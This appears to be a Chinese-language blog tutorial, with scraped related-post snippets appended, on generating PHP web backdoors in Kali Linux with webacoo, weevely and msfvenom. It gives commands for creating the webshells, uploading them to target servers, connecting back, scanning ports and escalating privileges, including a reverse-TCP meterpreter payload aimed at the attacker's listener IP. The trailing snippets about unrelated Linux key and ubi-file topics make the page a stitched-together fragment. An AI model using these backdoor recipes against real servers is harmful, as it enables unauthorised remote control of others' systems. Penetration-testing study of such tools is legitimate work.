很多時候在滲透測試時選擇web木馬害怕用的別人的馬帶有後門,這樣自己的辛苦就要被別人不勞而獲,很多時候我們都想擁有自己的馬,那麼這個時候你就應該使用kail來生成乙個自己獨特密碼的web木馬了。
kali linux自帶有好幾個web木馬生成工具,下面我們來簡單看幾個:
1.webacoo後門
webacoo -g -o test.php
-g 製作後門**
-o 輸出生成指定的後門程式檔名
把web後門上傳到目標伺服器後
使用kali linux訪問如下
webacoo -t -u
注意:上傳的路徑一定要正確
最後退出的時候使用exit退出
2.weevely
檢視幫助資訊
生成後門
下列命令可以生產混攪php backdoor , 密碼password 後門名字disaplay.php
把後門檔案上傳到伺服器後,如下命令可以成功訪問
weevely password
通過help看到weevely有很多的module
.net.ifaces 檢視伺服器的埠資訊
.net.scan 202.205.xx.xx 22 對伺服器某個埠掃瞄
3.php meterpreter
metasploit有乙個名為php meterpreter的payload,可建立具有meterpreter功能的php webshell。
metasploit的msfvenom工具可以製作php meterpreter,命令如下:
msfvenom -p php/meterpreter/reverse_tcp lhost=自己監聽的ip -f raw > php_meter.php
-p 設定payload
-f 設定輸出檔案格式
但是使用前需要注意生成檔案的第一行被注釋了,所以需要把注釋去掉才能使用
把webshell上傳到目標伺服器,本地監聽開啟如下:
啟動msfconsole
然後我們就可以使用kali的metasploit功能對目標伺服器進行一系列操作。
這種webshell 利用起來相當方便,輸入shell命令之後,就可以隨便提權什麼的了.
1,國內的貌似沒有防護這塊的,國內大多只防護get post cookie這些資料.
2,缺點是如果伺服器在dmz,則失效.
3,more what ..... 這種shell如果被利用多了,肯定會有硬體廠商去做防護的.
kali下生成web端後門
很多時候在 測試時選擇web 害怕用的別人的馬帶有後門,這樣自己的辛苦就要被別人不勞而獲,很多時候我們都想擁有自己的馬,那麼這個時候你就應該使用kail來生成乙個自己獨特密碼的web 了。kali linux自帶有好幾個web 生成工具,下面我們來簡單看幾個 1.webacoo後門 webacoo ...
linux下生成金鑰
生成金鑰步驟 star linux star gpg gen key your selection?回車 what keysize do you want 1024 回車 key is valid for?0 回車 key does not expire at all is this correct...
Linux下生成ubi檔案
先安裝 mktools.tar.gz 工具 將會在 usr sbin目錄下建立生成相應的工具集。注意 c是大寫的,c後面有個空格,c是改變解壓安裝目錄的意思 1 rootfs qtopia qt4 slc.ubi檔案生成方式 同乙個錯誤犯了兩次 錯誤命令 對應的flash不同,因此不能用mkubim...